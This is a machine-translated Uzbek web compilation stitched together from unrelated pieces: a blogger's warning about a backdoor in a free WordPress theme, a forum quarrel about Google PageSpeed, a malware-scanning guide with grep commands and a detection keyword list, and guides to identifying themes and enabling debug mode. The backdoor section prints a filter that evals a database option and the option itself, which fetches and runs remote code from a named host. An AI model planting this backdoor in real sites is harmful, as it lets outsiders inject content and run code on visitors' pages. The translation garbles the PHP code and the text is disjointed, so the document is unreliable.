Salom do'stlar. Veb-saytlaringiz va bloglaringiz uchun ishlatadigan bepul WordPress shabloningiz haqiqatan ham xavfsiz va yashirin tahdidlar yoki zararli kodlarni o'z ichiga olmaydi. Bunga to'liq ishonchingiz komilmi? Albatta?)

Siz shablonni bosib o'tdingiz, undan yashirin havolalarni olib tashladingiz va ish tugadi deb o'ylaysiz. Siz vaqti-vaqti bilan sayt fayllarini antivirus yordamida skanerlaysiz, Xavfsizlik yorlig'ida Yandex veb-master vositalarini ko'rib chiqasiz va u erda xabarni ko'rishdan xotirjam bo'lasiz: " Saytda hech qanday zararli kod aniqlanmadi«.

Men ham shunday deb o'yladim. Men sizni xafa qilishni xohlamayman, lekin ...

Bepul WordPress shablonlarida yashirin xavfli kod

Bu o'tgan hafta mening hosting kompaniyamdan elektron pochta orqali olgan xat. Yaqinda ular zararli kontentni qidirish uchun barcha sayt fayllarini muntazam tekshirishni joriy qilishdi va ular mendan bu tarkibni topdilar!

Hammasi bir kuni tushdan keyin veb-saytimga kirganimda va uni ishga tushira olmaganimda boshlandi — PHP kengaytmasi topilmagan fayllar haqida haqoratomuz xabar paydo bo'ldi. Bir oz taranglashib, men hostingdagi sayt bilan papkaning mazmunini o'rganishga bordim va darhol muammoni topdim - mening shablon faylim fuctions.php nomini functions.php.malware deb o'zgartirdim, bu noaniq ishora qilgandek tuyuldi - antivirus bu erda ishlayman yoki shunga o'xshash narsa) Pochtaga borib, men yuqoridagi hisobotni hosterdan topdim.

Men qilgan birinchi narsa, albatta, bu faylni tekshirish, uning mazmunini o'rganish, uni barcha turdagi antiviruslar, o'nlab onlayn viruslarni tekshirish xizmatlari va boshqalar bilan skanerlash edi. — oxir-oqibat, hech narsa topilmadi, hamma bir ovozdan fayl butunlay xavfsiz ekanligini ta'kidladi. Albatta, men mezbonga shubhalarimni bildirdim va siz nimanidir chalkashtirib yuborganingizni aytdim, lekin har ehtimolga qarshi, men ulardan zararli kod parchasi aniqlanganligi haqida hisobot berishlarini so'radim.

Va ular menga shunday javob berishdi

Men ushbu kod haqida Google ma'lumotlariga kirdim va jiddiy o'yladim ...

Shablonda zararli kodning bir qismini qanday topish mumkin

Ma'lum bo'lishicha, bu haqiqatan ham ahamiyatsiz bo'lmagan texnika bo'lib, manfaatdor tomonlarga sizning saytingizga ma'lumotlarni uzatish va sahifalar mazmunini sizning xabaringizsiz o'zgartirish imkonini beradi! Agar siz bepul shablondan foydalansangiz, unda Quyidagi kod uchun functions.php ni tekshirishni tavsiya qilaman:

qo'shimcha_filtr('tarkib', '_bloginfo', 10001);
funksiya _bloginfo($content)(
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
$co qaytarish;
) aks holda $kontentni qaytaring;
}

PHP bo'yicha juda sayoz bilimim bilan ham, global o'zgaruvchan post va kontentga bog'langan ma'lum bir filtr yaratilayotgani aniq, ular faqat blog postlari sahifalarida kontentni ko'rsatish uchun javobgardir (is_single sharti). Allaqachon shubhali, shunday emasmi? Keling, ushbu kod bizning veb-saytimizda nimani ko'rsatishini ko'rib chiqaylik.

Ma'lumotlar bazasida so'ralgan qiziqarli variant blogoption ham juda shubhali ko'rinadi. Biz MySQL ma'lumotlar bazasiga kiramiz va u erda wp_options deb nomlangan jadvalni topamiz, agar siz prefikslarni o'zgartirmagan bo'lsangiz, u sukut bo'yicha shunday ko'rinadi. Va unda biz blogoption deb nomlangan bizni qiziqtirgan qatorni topamiz

Qanday go'zal! Biz quyidagi variantni ko'ramiz

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.'&m=47&n'));

Bular. Muayyan saytdan (va ruscha) ular har qanday narsani o'z ichiga olishi mumkin bo'lgan tarkibni qaytarib berishmoqda! Har qanday miqdordagi havolalar, zararli kodlar, o'zgartirilgan matn va boshqalar. Saytning o'ziga kirganingizda, u sizga 403 kirish xatosini beradi, bu ajablanarli emas. Albatta, men bu variantni ma'lumotlar bazasidan ham olib tashladim.

Jabrlanuvchilarning ma'lumotlariga ko'ra, sizning maqolangizning aniq mazmuni odatda biron bir nuqta o'rniga faqat bitta o'zgartirish bilan qaytariladi. matnda ochiq havola yashiringan! Aytgancha, ushbu parametr shablonning o'zi o'rnatilganda ma'lumotlar bazasiga yoziladi va keyin buni muvaffaqiyatli bajaradigan kod o'zini o'zi yo'q qiladi. Va men ikki yil davomida bunday axlat bilan yashadim va shu vaqt ichida biron bir antivirus yoki xizmat menga bu tahdidni aniqlamadi. Rostini aytsam, bu hiyla men uchun ishlaganmi yoki mening xavfsizlik plaginim bu xususiyatni bloklaganmi (yoki WordPress yangilanishlaridan biri bu teshikni yopib qo'ygan bo'lsa), men buni sezmadim, lekin bu hali ham yoqimsiz.

Bepul pishloq haqida axloq

Shablonlarni "tarjimonlarimiz" (yoki ularni o'z kataloglarida joylashtirganlar)ning nafisligi sizga qanday yoqadi? Bu siz pastki qismdagi havolalarni kesib tashlashingiz uchun emas) Afsuski, shablonimni qayerdan yuklab olganimni eslay olmayman, bu uzoq vaqt oldin edi, aks holda men bir nechta mehrli narsalarni yozgan bo'lardim. Va agar o'sha paytda men hozir bo'lgan tajribamga ega bo'lsam, men mutlaqo bepul shablonni ishlatmagan bo'lardim yoki o'ta og'ir holatlarda uni noma'lum manbalardan yuklab olmagan bo'lardim!

15-20 dollarga biron bir rasmiy premium shablonni sotib olish va unda hech qanday teshik yoki shifrlangan havolalar yo'qligini bilib, tinchlikda yashash osonroq, hatto zaifliklar mavjud bo'lsa ham, ishlab chiquvchilar ushbu teshiklar bo'ladigan yangilanishni albatta chiqaradilar. yopiq. ( Aytgancha, Artem yaqinda maqola chop etdi, unda u premium shablonlar haqida gapiradi va hatto qiziquvchilar uchun shafqatsiz chegirmalar uchun reklama kodlarini beradi.)

• Googlefakerda vaqtingizni ham behuda sarflamang.

  Google asbobi, barcha kamchiliklariga qaramay, boshqalar qila olmaydigan narsalarni qila oladi - masalan, saytdagi rasmlar kerakli hajmda ko'rsatilmaganligini aniqlaydi. Bu 1000x1000 o'lchamdagi tasvir brauzer tomonidan 100x100 ga siqilgan 100x100 miniatyura sifatida ko'rsatilganda.

  Men tom ma'noda boshqa kuni shu masala bo'yicha egri mijoz mavzusini tuzatdim. u erda yon panelda 110x82 miniatyuralar ko'rsatilgan - lekin u erda asl, to'liq o'lchamli rasmlar to'ldirilgan.

  Bundan tashqari, yana qanday vosita sizning rasmlaringiz unchalik optimallashtirilmaganligini ko'rsatadi? png faylini sifatni yo'qotmasdan 500 kb dan 45 kb gacha siqish mumkin bo'lganda - bu juda muhim ma'lumot.

  Xo'sh, nega yana safsatalarni maslahat berasiz?

  Endi menga yana qanday vosita veb-sayt muammolarini aniqlay olishini ko'rsating?

  
  
  

  https://i.imgur.com/tOZcemv.jpg
  https://i.imgur.com/fEarWYT.jpg
  va hokazo.. Umid qilamanki, bu etarli.

  Flektor, Agar siz oddiy vositalardan foydalansangiz (va turli xil Google soxtalarini iste'mol qilmagan bo'lsangiz), bu savollar oddiygina bo'lmaydi.
  Yuqoridagilarning barchasi ushbu Google soxtasidan 3 baravar yuqori va foydaliroq ma'lumot beradi. Haqiqatan ham kerakli va foydali ma'lumotlar.

  Yuqoridagilarning barchasi ushbu Google soxtasidan 3 baravar yuqori va foydaliroq ma'lumot beradi. Haqiqatan ham kerakli va foydali ma'lumotlar.

  Menga Google vositasi yoqmaydi, faqat uning xizmatlari unga amal qilmagani uchun. lekin u rasmlar kabi aniq narsalarni mukammal ko'rsatadi. Xo'sh, gzip, brauzerni keshlash va boshqalar ham bor - ya'ni eng aniq.

  va men Googlega qarashni afzal ko'raman, chunki faqat uning bahosi muhim. Agar Google hali ham o'z baholashiga amal qilsa, uchinchi tomon xizmatlari ko'rsatishi qanday farq qiladi?

  Rasmlar qayerga noto'g'ri kiritilganligini bilish uchun o'zingiznikini tekshiring. Qanday muammolar?
  Men skrinshot olish uchun shunga o'xshash narsani topishda qiynalganman.

  chunki faqat uning bahosi muhim.

  Kimni ishi bor? Buni Googlega aytmang :)

  Ha, baholash. 100/100 olish muammo emas. Ammo bu sayt uchun falokat.
  
  

  Ha, baholash. 100/100 oling - muammo yo'q. Ammo bu sayt uchun falokat.

  Xo'sh, siz Google'ga 503 xato berdingiz, buning nima keragi bor?
  bu muammoning yechimi emas.

  va ha - Google reytingi muhim.
  Qanchalik bilmayman, ular bunday raqamlarni oshkor etmaydilar - lekin hech narsa bog'liq bo'lmagan xizmatni qilish ahmoqlik bo'lardi, to'g'rimi?

  PS va agar Google o'z reytingiga ahamiyat bermasa ham, bu birinchi navbatda Google uchun emas, balki webmasterning o'zi uchun kerak. agar webmasterda gzip yoqilmagan bo'lsa, brauzer keshlashi va tasvirlar to'g'ri o'lchamda bo'lmasa, buni tuzatish kerak.

  va Google muhim deb hisoblamagan narsani tuzatishga hojat yo'q (men boshqa xizmatlarning reytinglari haqida gapiryapman) - bu shunchaki vaqtni behuda sarflash bo'ladi.

  va ha - Google reytingi muhim.

  Hali ham natijalarni tahlil qilishni o'rganing.

  lekin hech narsa bog'liq bo'lmagan xizmat qilish ahmoqlik bo'lardi, shunday emasmi?

  Men sizga dahshatli sirni aytaman - Google xizmatlari (va nafaqat Google) uzoq vaqtdan beri odamlar uchun yaratilmagan. Xuddi shu Google xizmatlarining qanchasi unutilib ketdi? Qanchalik haqiqatan ham foydali edi va keyin g'oyib bo'ldi? Google odamlar uchun biror narsa qilgan kunlar o'tib ketdi. Bigdata, ha.

  Bu birinchi navbatda webmasterning o'zi uchun kerak,

  Webmaster uchun haqiqatan ham foydali va kerakli narsalar mavjud. Tasodifiy axlatga vaqt sarflashning ma'nosi yo'q. (agar siz sezmagan bo'lsangiz, ular Google to'tiqushlarini ham ko'rsatadilar)

  qanday sehrli bahona - natijalarni tahlil qilishni o'rganing.
  

  OK - Men ham sizga javob beraman - natijalarni tahlil qilishni o'rganing. qolgan barcha narsalar teng bo'lsa (mutlaq bir xil reyting omillari - havolalardan PFga), qidiruv natijalarida birinchi bo'lib Google-dan eng yuqori ball to'plagan sayt bo'ladi.

  menga ishonmaysizmi? Xo'sh, sizning haqingiz.
  Shunga o'xshash narsani sinab ko'rish hali ham mumkin emas - teng saytlar yo'q.

  Bu har qanday holatda ham muhim emas - chunki optimallashtirish Google uchun emas, balki o'z tashrif buyuruvchilari uchun amalga oshiriladi. xuddi shu rasmlarda bo'lgani kabi, veb-ustoz 5Mb rasmni eskiz sifatida qo'shganda.

  unda nima gap?

  Google to'tiqushlarining "ahamiyati" da.

  qanday sehrli bahona - natijalarni tahlil qilishni o'rganing.
  barcha holatlar uchun to'g'ridan-to'g'ri dalil.

  Agar siz PS haqida biror narsa aytsangiz, emissiya yagona haqiqiy dalildir.

  Shunga o'xshash narsani sinab ko'rish hali ham mumkin bo'lmaydi - teng saytlar yo'q.

  Nima uchun ular boshqacha? Qidiruv natijalarida ko'rsatilgan saytlar uchun Google to'tiqushlarini ham tekshira olmaysizmi? TOP10 ga 50 va hatto 30 tasi kiradi.

  bu minglab reyting omillaridan biri. Shuning uchun men "teng" (har xil bo'lmagan) saytlar haqida gapirdim - faqat bu holda siz Google to'tiqushlari ishlashiga amin bo'lishingiz mumkin.

  Facebook Google to'tiqushlari uchun “0” reytingiga ega bo'lishi mumkin, ammo bu “Facebook” so'rovi bo'yicha TOP1 bo'lib qoladi. bu qandaydir aniq.

  Google PageSpeed ​​Insights-da faqat bitta plyus bor - ish stoli va mobil uchun qidiruv natijalarini alohida tahlil qilish, aks holda bu har doimgidan qoniqmagan g'amgin xotin kabi yomon 😀 Tuzatib bo'lmaydigan narsalarni kam baholaydi, xato topadi (boshqa domenlar manbalari, shu jumladan xuddi shu Google)
  Analoglar juda ko'p; ko'plab xizmatlar veb-sayt konfiguratsiyasi muammolarini tahlil qiladi,
  Men ataylab mavzu boshida Pingdomga havola bermadim, masalan, menga Webpagetest ko'proq yoqadi, farq faqat shaklda, natija qanday taqdim etilganida va sub'ektiv qulaylikda.
  Ko'pchilik yomon siqilgan tasvirlarni ham topadi, yagona savol - 10 ta to'tiqushni tashlash va saytingizdagi rasmlar 1 bayt farq tufayli umuman optimallashtirilmaganligini aytish ...
  Xuddi shu GTMetrix-ni oling, PageSpeed ​​algoritmi va Yslow asosida baholash mavjud,
  Bundan tashqari, 95% PageSpeed-ga ega sayt Insights-da "pastki" optimallashtirilmagan bo'lishi mumkin, bu haqiqatan ham ularning muammosi va ular boshqalar uchun, ayniqsa reytinglar va natijalarning ma'nosini tahlil qila olmaydiganlar uchun muammo tug'diradi.
  Sayt yaxshi, optimallashtirilgan, lekin G PS I da - "hammasi yomon"

  Haqiqatan ham xuddi shu "Google to'tiqushlari" dunyodagi eng muhim reyting omili deb o'ylaysizmi?

  Menimcha, bu to'tiqushlar. Ular hech qanday foydali ma'lumot bermaydilar. Va yuklash tezligiga umuman ta'sir qilmaydi (qanday sahifa tezligi? Bu xizmat nomidan soxta). Tezlik Google to'tiqushlarida emas, balki bit/sekda o'lchanadi.
  Reytingga kelsak - agar TOP10 dagi saytlarda 30 ta Google to'tiqushlari bo'lsa, unda ulardan nima foyda?
  Shunga o'xshash narsa.

  Faqat bu holatda Google to'tiqushlari ishlashiga ishonch hosil qilishingiz mumkin.

  Bu to'tiqushlar emas, balki barcha omillar ishlaydi. Ularning 90% i bu soxtalikda emas, 90% esa - bema'nilik.
  Lamer uchun uning yagona foydasi shundaki, siz optimallashtirilgan grafiklarni yuklab olishingiz mumkin. Lekin uslublar va skriptlar emas, faqat grafikalar.

• “Saytda xatolar borligini tekshirish” mavzusi yangi javoblar uchun yopiq.

WordPress turli axborot veb-saytlari va bloglarini yaratish uchun eng mashhur vositadir. Veb-saytingiz xavfsizligi ma'lumotlaringiz xavfsizligidan ko'ra ko'proqdir. Bu juda muhimroq, chunki bu sizning manbangizni o'qigan va ishonadigan barcha foydalanuvchilarning xavfsizligi. Shuning uchun sayt viruslar yoki boshqa zararli kodlar bilan zararlangan emasligi juda muhim.

Quyidagi maqolalardan birida WordPress-ni buzishdan qanday himoya qilishni ko'rib chiqamiz, ammo endi men sizga WordPress veb-saytini viruslar va zararli kodlar uchun qanday tekshirish kerakligini aytmoqchiman, bu hamma narsa xavfsiz ekanligiga ishonch hosil qilish uchun.

Aqlga keladigan birinchi variant - sizni xakerlar buzib, spam yuborish, havolalar va boshqa yomon narsalarni yuborish uchun saytingiz kodiga ularning orqa eshiklarini o'rnatganingizdir. Bu ba'zida sodir bo'ladi, lekin agar siz dasturiy ta'minotni o'z vaqtida yangilasangiz, bu juda kam uchraydigan holat.

Minglab bepul WordPress mavzulari va turli plaginlar mavjud va bu allaqachon tahdid bo'lishi mumkin. WordPress saytidan shablonni yuklab olganingizda, bu boshqa narsa, chap saytdan topganingizda esa boshqa narsa. Vijdonsiz ishlab chiquvchilar o'z mahsulotlariga turli xil zararli kodlarni joylashtirishlari mumkin. Agar siz premium shablonlarni bepul yuklab olsangiz, xakerlar hech narsani xavf ostiga qo'ymasdan qandaydir xavfsizlik teshigini qo'shishlari mumkin bo'lsa, xavf yanada kattaroq bo'ladi, ular orqali ular kirib, kerakli narsani qilishlari mumkin. Shuning uchun WordPress saytida viruslarni tekshirish juda muhim.

WordPress saytini viruslar uchun tekshirish

Saytni tekshirishda siz murojaat qilishingiz kerak bo'lgan birinchi narsa viruslar emas, bu WordPress plaginlari. Tez va osonlik bilan siz saytingizni skanerlashingiz va shubhali kod joylarini topishingiz mumkin, ular mavzuda, plaginda yoki Wodpress-ning o'zida bo'ladimi, ularga e'tibor berish kerak. Keling, eng mashhur plaginlarning bir nechtasini ko'rib chiqaylik:

1.TOC

Ushbu juda oddiy plagin saytingizda o'rnatilgan barcha mavzularni ularda zararli kod bor yoki yo'qligini tekshiradi. Plagin base64 kodini kiritish orqali shifrlangan yashirin havolalarni aniqlaydi, shuningdek, topilgan muammolar haqida batafsil ma'lumotlarni ko'rsatadi. Ko'pincha topilgan kod qismlari viruslar emas, lekin ular potentsial xavfli bo'lishi mumkin, shuning uchun ularga e'tibor berishingiz kerak.

Ochiq "Tashqi ko'rinish" -> "TAK" keyin barcha mavzular tekshirilguncha kuting.

2. VIP skaner

TOC mavzu skaneriga juda o'xshaydi, lekin batafsilroq ma'lumotni ko'rsatadi. Havolalar, yashirin kod va boshqa zararli qo'shimchalarni aniqlash uchun bir xil imkoniyatlar. Asboblar bo'limida VIP skaner elementini oching va natijani tahlil qiling.

Bu keraksiz fayllarni o'chirish uchun etarli bo'lishi mumkin, masalan, desktop.ini. Yoki base64 yordamida fayllarda nima sodir bo'lishini batafsil ko'rib chiqishingiz kerak.

3. GOTMLS.NET dan zararli dasturlarga qarshi

Ushbu plagin nafaqat mavzularni va saytning yadrosini viruslarga skanerlash, balki saytni shafqatsiz kuch parollari va turli XSS, SQLInj hujumlaridan himoya qilish imkonini beradi. Qidiruv ma'lum imzolar va zaifliklar asosida amalga oshiriladi. Ba'zi zaifliklar saytda tuzatilishi mumkin. Fayllarni skanerlashni boshlash uchun oching "Malvarega qarshi" yon menyuda va bosing "Skanerlashni ishga tushirish":

Skanerlashni boshlashdan oldin imzo ma'lumotlar bazangizni yangilashingiz kerak.

4. Wordfence

Bu WordPress xavfsizligi va zararli dasturlarni skanerlash uchun eng mashhur plaginlardan biridir. WordPress kodidagi ko'pgina xatcho'plarni topishi mumkin bo'lgan skanerga qo'shimcha ravishda, har xil turdagi hujumlar va parolni qo'pol kuch ishlatishdan doimiy himoya mavjud. Qidiruv vaqtida plagin turli plaginlar va mavzular bilan bog'liq mumkin bo'lgan muammolarni topadi va WordPressni yangilash zarurligi haqida xabar beradi.

Yorliqni oching "WPDefence" yon menyuda va keyin yorlig'iga o'ting "Skanerlash" va bosing "Skanerlashni boshlash":

Skanerlash biroz vaqt talab qilishi mumkin, ammo tugallangach, topilgan muammolar haqida batafsil hisobotni ko'rasiz.

5. Antivirus

Bu sizning veb-saytingiz shablonini zararli kod uchun skanerlaydigan yana bir oddiy plagin. Kamchilik shundaki, faqat joriy shablon skanerdan o'tkaziladi, ammo ma'lumotlar etarli darajada batafsil ko'rsatiladi. Mavzudagi barcha xavfli funktsiyalarni ko'rasiz va keyin ular biron bir xavf tug'diradimi yoki yo'qligini batafsil tahlil qilishingiz mumkin. Element toping "Antivirus" sozlamalarida va keyin bosing "Mavzu shablonlarini hozir skanerlang":

6. Integrity Checker

Virus allaqachon biror joyda yozilgan bo'lsa, WordPress fayllari yaxlitligini tekshirish tavsiya etiladi. Buning uchun Integrity Checker plaginidan foydalanishingiz mumkin. U barcha asosiy, plagin va shablon fayllaridagi o'zgarishlarni tekshiradi. Skanerlash oxirida siz o'zgartirilgan fayllar haqida ma'lumotni ko'rasiz.

Onlayn xizmatlar

Bundan tashqari, WordPress saytida virus borligini tekshirish yoki faqat shablonni tekshirish imkonini beruvchi bir nechta onlayn xizmatlar mavjud. Mana ulardan ba'zilari:

themecheck.org- siz mavzu arxivini yuklab olasiz va unda ishlatilishi mumkin bo'lgan zararli funktsiyalar haqida barcha ogohlantirishlarni ko'rishingiz mumkin. Siz nafaqat mavzuingiz haqidagi ma'lumotlarni, balki boshqa foydalanuvchilar tomonidan yuklangan boshqa mavzular, shuningdek, mavzuning turli versiyalari haqida ham ko'rishingiz mumkin. Plaginlar nima bo'lishidan qat'i nazar, ushbu saytdan topish mumkin. WordPress mavzusini tekshirish ham juda muhim.

virustotal.com- veb-saytingiz yoki shablon faylini viruslarga tekshirishingiz mumkin bo'lgan taniqli manba.

ReScan.pro- ushbu xizmatdan foydalangan holda WordPress saytini viruslar uchun skanerlash bepul; mumkin bo'lgan yo'nalishlarni aniqlash uchun statik va dinamik tahlillar amalga oshiriladi; skaner sayt sahifalarini ochadi. Saytni turli qora ro'yxatlarga qarshi tekshiradi.

sitecheck.sucuri.net- saytlar va mavzularni viruslar uchun skanerlash uchun oddiy xizmat. WordPress uchun plagin mavjud. Xavfli havolalar va skriptlarni aniqlaydi.

Qo'lda tekshirish

Hech narsa qo'lda tekshirishdan yaxshiroq bo'lishi mumkin emas. Linuxda ushbu ajoyib grep yordam dasturi mavjud bo'lib, u fayllar bilan papkada ixtiyoriy satrlarni qidirish imkonini beradi. Biz nimani qidirayotganimizni tushunish qoladi:

eval - bu funksiya o'zboshimchalik bilan PHP kodini bajarishga imkon beradi, u o'zini hurmat qiladigan mahsulotlar tomonidan ishlatilmaydi; agar plaginlardan biri yoki mavzu ushbu funktsiyadan foydalansa, unda virus borligi deyarli 100% ehtimolga ega;

• base64_decode- shifrlash funksiyalari zararli kodni yashirish uchun eval bilan birgalikda ishlatilishi mumkin, lekin ular tinch maqsadlarda ham ishlatilishi mumkin, shuning uchun ehtiyot bo'ling;
• sha1- zararli kodni shifrlashning boshqa usuli;
• gzinflate- siqish funktsiyasi, bir xil maqsadlar, baholash bilan birga, masalan, gzinflate(base64_decode(code);
• strrev- chiziqni oldin emas, orqaga buradi, chunki ibtidoiy shifrlash uchun variantdan foydalanish mumkin;
• chop etish- ma'lumotni brauzerga chiqaradi, gzinflate yoki base64_decode bilan birgalikda bu xavfli;
• file_put_contents- WordPressning o'zi yoki plaginlari hali ham fayl tizimida fayllarni yaratishi mumkin, ammo agar mavzu buni qilsa, siz ehtiyot bo'lishingiz va nima uchun bunday qilishini tekshirishingiz kerak, chunki viruslar o'rnatilishi mumkin;
• file_get_contents- aksariyat hollarda tinch maqsadlarda foydalaniladi, lekin zararli kodni yuklab olish yoki fayllardan ma'lumotlarni o'qish uchun ishlatilishi mumkin;
• jingalak- xuddi shu hikoya;
• fopen- faylni yozish uchun ochadi, siz hech qachon nima maqsadda bilasiz;
• tizimi- funktsiya Linux tizimida buyruqni bajaradi, agar mavzu, plagin yoki wordpressning o'zi buni qilsa, u erda virus bo'lishi mumkin;
• ramziy bog'lanish- tizimda ramziy havolalar yaratadi, ehtimol virus asosiy fayl tizimini tashqaridan kirishga harakat qilmoqda;
• nusxa ko'chirish- faylni bir joydan ikkinchi joyga ko'chiradi;
• getcwd- joriy ishchi katalog nomini qaytaradi;
• cwd- joriy ishchi papkani o'zgartiradi;
• ini_get- PHP sozlamalari haqida ma'lumot oladi, ko'pincha tinch maqsadlarda, lekin siz hech qachon bilmaysiz;
• xato_hisoboti(0)- har qanday xato xabarlarini chiqarishni o'chiradi;
• window.top.joy.href- boshqa sahifalarga yo'naltirish uchun foydalaniladigan javascript funksiyasi;
• buzilgan- shuning uchun, har qanday holatda, biz tekshiramiz, to'satdan xakerning o'zi bizga aytishga qaror qildi.

Har bir alohida so'zni quyidagi kabi buyruq bilan almashtirishingiz mumkin:

grep -R "buzilgan" /var/www/path/to/files/wordpress/wp-content/

Yoki bir vaqtning o'zida barcha so'zlarni qidiradigan oddiy skriptdan foydalaning:

qadriyatlar = "base64_decode(
baholash (base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.joy.href
nusxa (
baho(
tizimi (
ramziy havola (
xato_hisoboti(0)
chop etish
file_get_contents(
file_put_contents(
fopen(
buzilgan"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$qiymatlar" *

Veb-sayt qaysi mavzudan foydalanishi haqida hech o'ylab ko'rganmisiz?

Ko'pincha, ideal mavzuni qidirib, biz shunga o'xshash narsalarni topish yoki o'z shaxsiy dizaynimiz bilan bir xil mavzuda o'z veb-saytimizni yaratish uchun boshqa tugallangan loyihalarni ko'rib chiqamiz.

Ushbu qo'llanmada biz sizga WordPress saytingiz qaysi mavzudan foydalanayotganini bilish uchun qanday vositalar va fokuslardan foydalanishingiz mumkinligini ko'rsatamiz.

1-usul. IsItWP tekshirish sayti

Eng oson yo'li - isitwp.com saytiga o'tish va sizni qiziqtirgan saytni tekshirish.

Bu WordPress qaysi mavzudan foydalanayotganini va hatto ushbu saytda WordPress ishlatilayotganligini ko'rsatadigan onlayn vositadir.

Agar sayt WordPress bilan ishlayotgan bo'lsa, IsItWP joriy mavzu nomini bilishga harakat qiladi.

Shuningdek, u saytda qanday faol plaginlar ishlatilishini aniqlashga harakat qiladi:

Agar omadingiz bo'lsa va bu odatiy yoki bolalar mavzusi bo'lmasa, IsItWP o'z nomini ko'rsatadi va keyin siz ushbu mavzuni qidiruv tizimlarida topishingiz mumkin.

2-usul. Qo'lda aniqlang

Ba'zan sayt egalari yoki ishlab chiquvchilari WordPress mavzusining nomini o'zgartiradilar. Bunday holda, IsItWP kabi vositalar sizga yordam bera olmaydi.

Ammo shunday bo'lsa ham, sayt kodida qanday mavzu o'rnatilganligini aniqlashga yordam beradigan turli xil maslahatlar bo'lishi mumkin.

Keling, ko'rib chiqaylik.

Har bir WordPress mavzusida fayl bo'lishi kerak style.css. Ushbu fayl ichida sarlavha mavjud bo'lib, unda odatda mavzu nomi, mavzu muallifi, versiya va mavzuni ishlab chiquvchi sayt ko'rsatiladi. Shuningdek, u mavzu ishlatadigan boshqa CSS uslubi shablonlarini ham ko'rsatadi.

Ushbu faylni topish uchun avvalo saytning o'ziga o'tishingiz kerak. Asosiy sahifaning biron bir joyini o'ng tugmasini bosing va manba kodini ko'rish uchun o'ting ( Sahifa manbasini ko'rish).

Saytning asosiy sahifasining manba kodi brauzerda yangi tabda ochiladi.

Endi siz shunga o'xshash kod qatorini topishingiz kerak:

Vazifani osonlashtirish uchun siz ushbu yorliqda fragmentning kodi bilan qidirishingiz mumkin " mavzular". Bu katalogning bir qismi, bu erda style.css.

Shu tarzda siz style.css fayli joylashgan yo'lni topasiz va ushbu faylni to'g'ridan-to'g'ri brauzerda yangi tabda ochishingiz mumkin.

style.css ning yuqori qismida sarlavhali sarlavha bo'ladi (bu haqda biz yuqorida gaplashdik). Bu mavzu haqida xizmat ma'lumotlari. Bu shunday ko'rinadi:

/* Mavzu nomi: Mavzu nomi Mavzu URI: https://example.com Muallif: ThemeAuthorName Muallif URI: https://example.com Tavsif: Mening Mavzum portfel veb-saytlari uchun mo'ljallangan moslashuvchan WordPress mavzusi Versiya: 1.1.47 Litsenziya: GNU General Public License v2 yoki undan keyingi Litsenziya URI: http://www.gnu.org/licenses/gpl-2.0.html Matn domeni: hestia Teglar: blog, maxsus logotip, portfel, e-tijorat, rtl-language-support , post formatlari, panjara tartibi, bitta ustunli, ikki ustunli, maxsus fon, maxsus ranglar, maxsus sarlavha, maxsus menyu, tanlangan tasvir sarlavhasi, tanlangan tasvirlar, moslashuvchan sarlavha, to‘liq kenglik -shablon, yopishqoq post, mavzu-variantlar, o'rnatilgan sharhlar, tarjimaga tayyor */

Ushbu blokdan siz mavzu nomini va ishlab chiquvchining manzilini bilib olishingiz mumkin. Keyin qolgan narsa bu mavzuni Internetda topishdir.

Usul 3. Asosiy mavzuni qanday topish mumkin

Ko'pgina saytlar tashqi ko'rinishini sozlash uchun bolalar mavzularidan foydalanadi. Va bu mutlaqo to'g'ri yondashuv.

Bunday holda, agar siz faylni topsangiz style.css bola mavzusidan uning sarlavhasi asosiy mavzu haqida ma'lumotni o'z ichiga oladi:

/* Mavzu nomi: Mening bolam Mavzu tavsifi: Shunchaki bolalar mavzusi Muallif: Piter Smit Muallif URL manzili: Bu yerda muallifning blogi yoki veb-sayt url manzilini yozing Andoza: hestia Versiya: 1.0 Litsenziya: GNU General Public License v2 yoki undan keyingi Litsenziya URI: http :/ /www.gnu.org/licenses/gpl-2.0.html Matn domeni: my-child-theme */

Yuqoridagi misolda asosiy mavzu parametr bilan ko'rsatilgan " Shablon", ya'ni bu bola mavzusi "Hestia" ota-onasidan foydalanadi.

Shuningdek, siz ota-ona mavzusi haqida 2-usulda tasvirlangan manba kodidan bilib olishingiz mumkin. Kodda siz style.css fayliga faqat asosiy mavzudan emas, balki asosiy mavzudan ham havola topasiz.

Ammo shuni unutmangki, ishlab chiquvchi style.css uchun barcha sarlavhalarni o'ziga o'zgartirishga urinib ko'rishi mumkin, bu holda asl mavzuni aniqlash juda qiyin bo'ladi.

Hammaga salom! Vaqt bir joyda turmaydi va har safar yadroda yangi funksiyalar paydo bo'lgandan keyin. Agar ilgari o'sha paytdagi nostandart vazifalarning aksariyati qo'shimcha dasturlash yordamida amalga oshirilishi kerak bo'lsa, endi vaziyat o'zgarmoqda. Funktsionallikni qutidan kengaytirishning aniq tendentsiyasi mavjud.

2010-yilga nazar tashlar ekanman, kashfiyotlar ostonasida turib, birinchi marta tanishganimda, birinchi qadamlarimni tashlashim qanchalik qiyin bo‘lganini eslayman. Har bir elementar vazifa uchun men plaginlarni topdim va o'rnatdim; ularning umumiy soni bir necha o'nga yetishi mumkin! 😮 Keyin qayta o'ylash va minimalizmga intilish vaqti keldi. Optimallashtirish bo'limi blogni tezlashtirish uchun qilgan ishimning ba'zi jihatlarini aks ettiradi.

WordPress disk raskadrovka rejimini yoqing

Blog shabloni birinchi kunlardan boshlab o'zgarishlarga duch keldi, yangi funksiyalar, uslublar va sinflarga ega bo'ldi. Kritik massaga ega bo'lib, u noqulay bo'lib qoldi - ish holatini va yuqori mahsuldorlikni saqlash juda qiyin. Bir qarashda ko'rinmaydigan katta o'zgarishlar o'tgan yili sodir bo'ldi - yangi tartib va ​​eskizlar bilan ishlashdan tortib mikro belgilashgacha.

Transformatsiyadan keyingi birinchi narsa brauzerda ishlab chiquvchi konsolini ochish va xatolar va ogohlantirishlarni tekshirish edi. Keyingi qadam - WordPress nosozliklarini tuzatish. Tartib wp-config.php konfiguratsiya faylida yoqilgan, undagi qatorni toping:

Aniqlash("WP_DEBUG" , noto'g'ri );

va false ni true bilan almashtiring. Chiziq quyidagicha ko'rinishi kerak:

Aniqlash("WP_DEBUG", rost);

